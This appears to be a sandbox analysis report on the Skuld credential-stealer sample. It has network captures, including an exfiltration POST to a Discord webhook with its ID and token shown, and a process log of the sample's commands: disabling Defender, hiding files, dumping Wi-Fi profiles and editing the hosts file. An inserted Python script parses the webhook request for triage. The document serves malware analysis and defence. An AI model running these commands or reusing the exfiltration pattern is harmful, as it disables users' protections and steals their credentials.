                                                                                                                                          2025-03-12 09:41:25 UTC6676OUTData Raw: ed c0 3e c3 b5 54 ae 67 07 82 b1 ae 13 d8 f6 cd fe 73 5a 7e ae 73 1c 00 00 00 00 00 00 b0 db 31 16 e3 94 e8 6f 00 7a b7 03 fb aa 34 00 8c 15 4a 02 00 00 00 00 00 00 bb 15 63 31 7e ce eb b8 be 10 30 27 da 57 80 bd db a6 7d 9e eb f8 82 bc 58 d7 09 6e db d7 e1 b5 5f 00 00 00 00 00 00 40 33 16 13 13 7c ed 36 f4 bb 80 95 05 75 de 7d 16 df 75 a2 9d 17 c7 76 b0 3f bc 02 0c 00 00 00 00 00 80 dd 97 b1 08 00 00 00 00 00 00 20 3b 18 8b 00 00 00 00 00 00 00 b2 83 b1 08 00 00 00 00 00 00 20 3b 18 8b 00 00 00 00 00 00 00 b2 83 b1 08 00 00 00 00 00 00 20 3b 18 8b 00 00 00 00 00 00 00 b2 83 b1 08 00 00 00 00 00 00 20 3b 18 8b 00 00 00 00 00 00 00 b2 83 b1 08 00 00 00 00 00 00 20 3b 18 8b 00 00 00 00 00 00 00 b2 83 b1 08 00 00 00 00 00 00 20 3b 18 8b 00 00 00 00 00 00 00
                                                                                                                                          Data Ascii: >TgsZ~s1oz4Jc1~0'W}Xn_@3|6u}uv? ; ; ; ; ; ;
                                                                                                                                          2025-03-12 09:41:25 UTC10674OUTData Raw: ac e3 c2 fb 4c cf 1b cf bd fd cf 6f 37 35 36 e6 67 52 9b d6 35 43 63 e3 8c 69 4e 9e d8 bb 53 ef 4f ec b1 a0 11 00 02 00 80 14 18 8b 48 b3 64 03 40 15 ec b9 e7 96 3d f5 a8 6c 6f 72 61 68 5b 51 41 a0 aa 85 ea 47 1d 10 f3 15 61 f7 3c 53 1f 01 00 48 b7 84 03 40 ab 15 e4 d9 41 5e 30 bb f2 05 57 2a a8 0a 04 53 7a 9f 0e 10 9d 73 03 61 a2 3a df be 66 81 e4 e5 b8 21 94 13 5e 85 02 29 27 ac 72 6f ae 5f 47 76 af e1 3d 36 d6 71 6a 33 dc 57 fb 79 cc a1 57 ac e3 2a 7b de 58 f7 8e 7c ce 70 d3 f7 f1 9c 9b 63 1d e3 de 27 7c 4f fb 1e a1 fb 5b 2d 95 fe b8 e7 c5 1a 0b 1a 01 20 00 00 48 89 b1 88 34 73 83 37 53 28 17 4d c9 fc 9f 42 b3 ff 5c 2a e8 d3 b3 fd de 1f aa 5f 09 56 fb d5 b6 9a f9 a7 02 42 f7 18 d3 f5 14 f7 3a a6 3e 02 00 90 6e c9 04 80 76 73 42 25 5f c8 e4 0d 8e bc db
                                                                                                                                          Data Ascii: Lo756gR5CciNSOHd@=lorah[QAGa<SH@A^0W*Szsa:f!^)'ro_Gv=6qj3WyW*{X|pc'|O[- H4s7S(MB\*_VB:>nvsB%_
                                                                                                                                          2025-03-12 09:41:25 UTC11860OUTData Raw: 10 ce 04 9c 0c 00 57 6a 00 38 94 00 b0 97 10 00 02 00 00 00 00 00 a4 9e 59 2c 49 b6 fb 4f c3 bf 48 f7 df c6 69 fe 7a cb 1c d9 f1 ec 59 b2 4b 67 02 4e 06 80 4b 2f 48 04 80 97 49 9b ce 04 4c 00 d8 2b 08 00 01 00 00 00 00 00 52 cf 2c 96 24 db fd a7 e1 df ad 7e d7 9f 76 ff 6d 9c ea 6f 6f 99 1d 0b 00 eb 17 9d 13 04 80 fe 44 20 04 80 71 27 9f 7c b2 7c e6 33 9f 91 53 4e 39 45 6e bd f5 d6 9c da 8d 37 de e8 6a 0f 3d f4 90 ab 85 f4 73 f4 3a 16 02 40 00 00 00 00 00 80 d4 33 8b 25 c9 db fd a7 01 e0 e6 99 b2 7f e5 f5 f1 0e 40 9d 09 38 19 00 be 92 3f 00 ec 70 01 e0 88 8a 09 00 c3 30 ef 9e 7b ee 71 db 8b 16 2d 72 6b 0d 03 9f 78 e2 09 17 06 6a 08 18 ee d7 9a da b6 6d 9b 79 bd 28 02 40 00 00 00 00 00 80 d4 33 8b 25 c9 db fd a7 21 e0 e6 19 b2 f3 f9 73 5d 00 b8 d3 05 80 83
                                                                                                                                          Data Ascii: Wj8Y,IOHizYKgNK/HIL+R,$~vmooD q'||3SN9En7j=s:@3%@8?p0{q-rkxjmy(@3%!s]
2025-03-12 09:41:26 UTC | 1128 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 12 Mar 2025 09:41:26 GMT
                                                                                                                                          Content-Type: application/json
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          Set-Cookie: __dcfduid=2a9d383eff2611ef82bccacda771ab44; Expires=Mon, 11-Mar-2030 09:41:26 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                          strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                          x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                                          x-ratelimit-limit: 5
                                                                                                                                          x-ratelimit-remaining: 4
                                                                                                                                          x-ratelimit-reset: 1741772487
                                                                                                                                          x-ratelimit-reset-after: 1
                                                                                                                                          vary: Accept-Encoding
                                                                                                                                          via: 1.1 google
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VDr0cS4lfrYc8AEOFGg4pvnyr6oDa%2FZU2qg%2FqJXnQJ%2BCvv5Yz0WSonf841wxiN91qVlhJiGHwpOx9S04H12d%2Bwex14SxMfvXwTKbDH%2BKOuOLaBGi5yVY2XmnGQSv"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                          Reporting-Endpoints: csp-sentry="https://o64374.ingest.sentry.io/api/5441894/security/?sentry_key=8fbbce30bf5244ec9429546beef21870&sentry_environment=stable"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.18 | 49761 | 162.159.137.232 | 443 | 7148 | C:\Users\user\Desktop\skuld.exe
Timestamp | Bytes transferred | Direction | Data
2025-03-12 09:41:28 UTC | 321 | OUT | POST /api/webhooks/1348329799772405922/9M5Ip-UwI2E-RbEuavliXkxmbDrNISUsPSueTCkwz7rQ0ShxJDLxEcHc2J1j85aQHNbw HTTP/1.1
                                                                                                                                          Host: discord.com
                                                                                                                                          User-Agent: Go-http-client/1.1
                                                                                                                                          Content-Length: 287
                                                                                                                                          Content-Type: multipart/form-data; boundary=b1b87285c08b2c052a76e6c794e732a9af3417a2f7d86fce4544f23ca996
                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                          2025-03-12 09:41:28 UTC287OUTData Raw: 2d 2d 62 31 62 38 37 32 38 35 63 30 38 62 32 63 30 35 32 61 37 36 65 36 63 37 39 34 65 37 33 32 61 39 61 66 33 34 31 37 61 32 66 37 64 38 36 66 63 65 34 35 34 34 66 32 33 63 61 39 39 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 61 79 6c 6f 61 64 5f 6a 73 6f 6e 22 0d 0a 0d 0a 7b 22 61 76 61 74 61 72 5f 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 69 2e 69 62 62 2e 63 6f 2f 47 46 5a 32 74 48 4a 2f 73 68 61 6b 61 62 61 69 61 6e 6f 2d 31 36 37 34 32 38 32 34 38 37 2e 6a 70 67 22 2c 22 65 6d 62 65 64 73 22 3a 5b 5d 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 6b 75 6c 64 22 7d 0a 0d 0a 2d 2d 62 31 62 38 37 32 38 35 63 30 38 62 32 63 30 35 32 61 37 36 65 36 63 37 39 34 65 37 33 32 61 39
                                                                                                                                          Data Ascii: --b1b87285c08b2c052a76e6c794e732a9af3417a2f7d86fce4544f23ca996Content-Disposition: form-data; name="payload_json"{"avatar_url":"https://i.ibb.co/GFZ2tHJ/shakabaiano-1674282487.jpg","embeds":[],"username":"skuld"}--b1b87285c08b2c052a76e6c794e732a9
2025-03-12 09:41:28 UTC | 1358 | IN | HTTP/1.1 400 Bad Request
                                                                                                                                          Date: Wed, 12 Mar 2025 09:41:28 GMT
                                                                                                                                          Content-Type: application/json
                                                                                                                                          Content-Length: 58
                                                                                                                                          Connection: close
                                                                                                                                          Set-Cookie: __dcfduid=2bfa1b8eff2611ef9f7ec295391f385e; Expires=Mon, 11-Mar-2030 09:41:28 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                          strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                          x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                                          x-ratelimit-limit: 5
                                                                                                                                          x-ratelimit-remaining: 4
                                                                                                                                          x-ratelimit-reset: 1741772489
                                                                                                                                          x-ratelimit-reset-after: 1
                                                                                                                                          via: 1.1 google
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1U%2BlTiicCrXdJaCCnodnrOAjlcpRLMWftQhDMzYCAm68JRU%2BQ%2FZVruy81BvkMWUrJJaAL9XpRfeBsHD1HewcWoSKa%2BcJco0fBwzAfrzT6QejfzRzuqyh9ZXF6o%2FT"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                          Reporting-Endpoints: csp-sentry="https://o64374.ingest.sentry.io/api/5441894/security/?sentry_key=8fbbce30bf5244ec9429546beef21870&sentry_environment=stable"
                                                                                                                                          Content-Security-Policy: frame-ancestors 'none'; default-src https://o64374.ingest.sentry.io; report-to csp-sentry; report-uri https://o64374.ingest.sentry.io/api/5441894/security/?sentry_key=8fbbce30bf5244ec9429546beef21870&sentry_environment=stable
                                                                                                                                          2025-03-12 09:41:28 UTC566INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 5f 73 64 63 66 64 75 69 64 3d 32 62 66 61 31 62 38 65 66 66 32 36 31 31 65 66 39 66 37 65 63 32 39 35 33 39 31 66 33 38 35 65 63 31 39 30 30 66 64 37 30 32 62 37 66 33 37 38 63 35 32 30 64 64 32 65 63 36 62 32 66 61 62 61 64 34 30 64 31 32 63 35 37 63 30 65 61 63 64 35 37 33 34 37 38 38 63 39 66 61 33 39 38 37 65 33 3b 20 45 78 70 69 72 65 73 3d 4d 6f 6e 2c 20 31 31 2d 4d 61 72 2d 32 30 33 30 20 30 39 3a 34 31 3a 32 38 20 47 4d 54 3b 20 4d 61 78 2d 41 67 65 3d 31 35 37 36 38 30 30 30 30 3b 20 53 65 63 75 72 65 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 50 61 74 68 3d 2f 3b 20 53 61 6d 65 53 69 74 65 3d 4c 61 78 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 5f 63 66 72 75 69 64 3d 30 36 66 30 35 31 64 35 30 62 30 63 64 30 35
                                                                                                                                          Data Ascii: Set-Cookie: __sdcfduid=2bfa1b8eff2611ef9f7ec295391f385ec1900fd702b7f378c520dd2ec6b2fabad40d12c57c0eacd5734788c9fa3987e3; Expires=Mon, 11-Mar-2030 09:41:28 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=06f051d50b0cd05
2025-03-12 09:41:28 UTC | 58 | IN | Data Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 43 61 6e 6e 6f 74 20 73 65 6e 64 20 61 6e 20 65 6d 70 74 79 20 6d 65 73 73 61 67 65 22 2c 20 22 63 6f 64 65 22 3a 20 35 30 30 30 36 7d
                                                                                                                                          Data Ascii: {"message": "Cannot send an empty message", "code": 50006}
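The session 4 exchange above, turned into a triage routine. This is an added example, not code from the report or from the Skuld sample: it re-parses the captured POST (request line, headers and multipart body transcribed from the dump above; the Content-Length header is recomputed from the rebuilt body rather than copied), pulls out the webhook ID and token, derives the webhook's creation time from the snowflake ID, lists any attached files, and explains Discord's reply. The function names, indicator strings and the response mapping are my own; the only Discord error code it interprets specifically is the 50006 seen in the reply above.

```python
"""Triage of a Discord-webhook exfiltration request as captured in session 4.

Given the raw request bytes, recover the webhook ID/token, the webhook's
creation time (encoded in its snowflake ID), the bot name in payload_json and
any attached files, then read Discord's reply to tell whether data left.
"""
import json
import re
from datetime import datetime, timezone

DISCORD_EPOCH_MS = 1420070400000  # 2015-01-01T00:00:00Z, origin of snowflake IDs
WEBHOOK_PATH = re.compile(r"^/api/webhooks/(?P<id>\d+)/(?P<token>[A-Za-z0-9_-]+)$")


def parse_http_request(raw: bytes) -> dict:
    """Split a raw HTTP/1.1 request into method, path, lower-cased headers and body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "headers": headers, "body": body}


def parse_multipart(body: bytes, content_type: str) -> dict:
    """Minimal multipart/form-data parser: field name -> (filename or None, data)."""
    m = re.search(r'boundary="?([^";]+)"?', content_type)
    if not m:
        raise ValueError("Content-Type carries no multipart boundary")
    delimiter = b"--" + m.group(1).encode("ascii")
    parts = {}
    for chunk in body.split(delimiter)[1:]:
        if chunk.startswith(b"--"):  # "--boundary--" closes the body
            break
        part_head, _, data = chunk.lstrip(b"\r\n").partition(b"\r\n\r\n")
        if data.endswith(b"\r\n"):  # the CRLF before the next delimiter is not payload
            data = data[:-2]
        head_text = part_head.decode("latin-1")
        name = re.search(r'(?<!file)name="([^"]*)"', head_text)  # skip filename="..."
        filename = re.search(r'filename="([^"]*)"', head_text)
        parts[name.group(1) if name else ""] = (filename.group(1) if filename else None, data)
    return parts


def snowflake_to_datetime(snowflake: int) -> datetime:
    """Discord snowflake -> creation time: the top 42 bits are ms since the Discord epoch."""
    return datetime.fromtimestamp(((snowflake >> 22) + DISCORD_EPOCH_MS) / 1000, tz=timezone.utc)


def triage_webhook_request(raw: bytes) -> dict:
    """Return indicators and extracted fields; an empty indicator list means 'not a webhook post'."""
    req = parse_http_request(raw)
    h = req["headers"]
    result = {"indicators": [], "webhook_id": None, "webhook_token": None,
              "webhook_created": None, "username": None, "files": []}
    m = WEBHOOK_PATH.match(req["path"])
    if req["method"] != "POST" or not m or h.get("host", "").lower() not in ("discord.com", "discordapp.com"):
        return result
    result["indicators"].append("POST to Discord webhook endpoint")
    result["webhook_id"], result["webhook_token"] = m["id"], m["token"]
    result["webhook_created"] = snowflake_to_datetime(int(m["id"]))
    if h.get("user-agent", "").startswith("Go-http-client/"):
        result["indicators"].append("Go default User-Agent, not a browser or the Discord client")
    ctype = h.get("content-type", "")
    if ctype.startswith("multipart/form-data"):
        parts = parse_multipart(req["body"], ctype)
        if "payload_json" in parts:
            result["username"] = json.loads(parts["payload_json"][1]).get("username")
        result["files"] = [fn for fn, _ in parts.values() if fn]
        if result["files"]:
            result["indicators"].append("file attachments: " + ", ".join(result["files"]))
    return result


def interpret_webhook_response(status: int, body: bytes) -> str:
    """Read Discord's reply: did the post (and any attachments) actually land?"""
    if status in (200, 204):
        return "accepted: the payload and any attachments reached the webhook's channel"
    try:
        err = json.loads(body)
    except ValueError:
        return f"HTTP {status}: non-JSON error body"
    if err.get("code") == 50006:  # the code seen in the session 4 reply
        return "rejected: webhook is live but this request carried no content, embeds or files"
    return f"HTTP {status}: Discord error {err.get('code')}: {err.get('message')}"


# Sample input transcribed from the session 4 dump (Content-Length recomputed from the rebuilt body).
_BOUNDARY = b"b1b87285c08b2c052a76e6c794e732a9af3417a2f7d86fce4544f23ca996"
_BODY = b"".join([
    b"--", _BOUNDARY, b"\r\n",
    b'Content-Disposition: form-data; name="payload_json"\r\n\r\n',
    b'{"avatar_url":"https://i.ibb.co/GFZ2tHJ/shakabaiano-1674282487.jpg","embeds":[],"username":"skuld"}\n',
    b"\r\n--", _BOUNDARY, b"--\r\n",
])
SAMPLE_REQUEST = b"".join([
    b"POST /api/webhooks/1348329799772405922/"
    b"9M5Ip-UwI2E-RbEuavliXkxmbDrNISUsPSueTCkwz7rQ0ShxJDLxEcHc2J1j85aQHNbw HTTP/1.1\r\n",
    b"Host: discord.com\r\nUser-Agent: Go-http-client/1.1\r\n",
    b"Content-Length: " + str(len(_BODY)).encode() + b"\r\n",
    b"Content-Type: multipart/form-data; boundary=" + _BOUNDARY + b"\r\n",
    b"Accept-Encoding: gzip\r\n\r\n", _BODY,
])
SAMPLE_RESPONSE_BODY = b'{"message": "Cannot send an empty message", "code": 50006}'

if __name__ == "__main__":
    print(json.dumps(triage_webhook_request(SAMPLE_REQUEST), indent=2, default=str))
    print(interpret_webhook_response(400, SAMPLE_RESPONSE_BODY))
```

Two points worth reading off the output: the webhook ID decodes to a creation time of 2025-03-09, three days before this run, which dates the campaign infrastructure; and the 400 with code 50006 means this particular post carried nothing (empty embeds, no files), so the data transfer to look for is the earlier multipart upload in this session, not this request.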


                                                                                                                                          Target ID:0
                                                                                                                                          Start time:05:40:43
                                                                                                                                          Start date:12/03/2025
                                                                                                                                          Path:C:\Users\user\Desktop\skuld.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:"C:\Users\user\Desktop\skuld.exe"
                                                                                                                                          Imagebase:0x950000
                                                                                                                                          File size:10'810'368 bytes
                                                                                                                                          MD5 hash:1B19480E05B72ABB96AAFDF9625B5646
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Yara matches:
                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000000.1453903511.0000000000E47000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_SkuldStealer, Description: Yara detected Skuld Stealer, Source: 00000000.00000000.1453903511.0000000000E47000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                          Reputation:low
                                                                                                                                          Has exited:false

                                                                                                                                          Target ID:1
                                                                                                                                          Start time:05:40:44
                                                                                                                                          Start date:12/03/2025
                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                          Imagebase:0x7ff7b8370000
                                                                                                                                          File size:862'208 bytes
                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:false

                                                                                                                                          Target ID:2
                                                                                                                                          Start time:05:40:44
                                                                                                                                          Start date:12/03/2025
                                                                                                                                          Path:C:\Windows\System32\attrib.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:attrib +h +s C:\Users\user\Desktop\skuld.exe
                                                                                                                                          Imagebase:0x7ff7f8ad0000
                                                                                                                                          File size:23'040 bytes
                                                                                                                                          MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:moderate
                                                                                                                                          Has exited:true

Target ID: 3
Start time: 05:40:44
Start date: 12/03/2025
Path: C:\Windows\System32\attrib.exe
Wow64 process (32bit): false
Commandline: attrib +h +s C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe
Imagebase: 0x7ff7f8ad0000
File size: 23'040 bytes
MD5 hash: 5037D8E6670EF1D89FB6AD435F12A9FD
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: true

Target ID: 4
Start time: 05:40:46
Start date: 12/03/2025
Path: C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit): false
Commandline: wmic csproduct get UUID
Imagebase: 0x7ff7d80a0000
File size: 576'000 bytes
MD5 hash: C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 5
Start time: 05:40:47
Start date: 12/03/2025
Path: C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit): false
Commandline: wmic path win32_VideoController get name
Imagebase: 0x7ff7d80a0000
File size: 576'000 bytes
MD5 hash: C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 6
Start time: 05:40:48
Start date: 12/03/2025
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\Desktop\skuld.exe
Imagebase: 0x7ff709200000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 7
Start time: 05:40:48
Start date: 12/03/2025
Path: C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit): false
Commandline: wmic os get Caption
Imagebase: 0x7ff7d80a0000
File size: 576'000 bytes
MD5 hash: C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 8
Start time: 05:40:49
Start date: 12/03/2025
Path: C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit): false
Commandline: wmic cpu get Name
Imagebase: 0x7ff7d80a0000
File size: 576'000 bytes
MD5 hash: C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 9
Start time: 05:40:50
Start date: 12/03/2025
Path: C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit): false
Commandline: wmic path win32_VideoController get name
Imagebase: 0x7ff7d80a0000
File size: 576'000 bytes
MD5 hash: C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 11
Start time: 05:40:51
Start date: 12/03/2025
Path: C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit): false
Commandline: wmic csproduct get UUID
Imagebase: 0x7ff7d80a0000
File size: 576'000 bytes
MD5 hash: C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 12
Start time: 05:40:52
Start date: 12/03/2025
Path: C:\Windows\System32\netsh.exe
Wow64 process (32bit): false
Commandline: netsh wlan show profiles
Imagebase: 0x7ff657cb0000
File size: 96'768 bytes
MD5 hash: 6F1E6DD688818BC3D1391D0CC7D597EB
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 13
Start time: 05:40:52
Start date: 12/03/2025
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
Imagebase: 0x7ff709200000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 15
Start time: 05:40:54
Start date: 12/03/2025
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Imagebase: 0x7ff709200000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 16
Start time: 05:40:55
Start date: 12/03/2025
Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dh1o0wbe\dh1o0wbe.cmdline"
Imagebase: 0x7ff74c050000
File size: 2'759'232 bytes
MD5 hash: F65B029562077B648A6A5F6A1AA76A66
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 17
Start time: 05:40:55
Start date: 12/03/2025
Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit): false
Commandline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD9F3.tmp" "c:\Users\user\AppData\Local\Temp\dh1o0wbe\CSC88D051478A0408BB4BF8545E397BDC4.TMP"
Imagebase: 0x7ff6bf170000
File size: 52'744 bytes
MD5 hash: C877CBB966EA5939AA2A17B6A5160950
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 18
Start time: 05:41:25
Start date: 12/03/2025
Path: C:\Windows\System32\attrib.exe
Wow64 process (32bit): false
Commandline: attrib -r C:\Windows\System32\drivers\etc\hosts
Imagebase: 0x7ff7f8ad0000
File size: 23'040 bytes
MD5 hash: 5037D8E6670EF1D89FB6AD435F12A9FD
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 19
Start time: 05:41:25
Start date: 12/03/2025
Path: C:\Windows\System32\attrib.exe
Wow64 process (32bit): false
Commandline: attrib +r C:\Windows\System32\drivers\etc\hosts
Imagebase: 0x7ff7f8ad0000
File size: 23'040 bytes
MD5 hash: 5037D8E6670EF1D89FB6AD435F12A9FD
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

No disassembly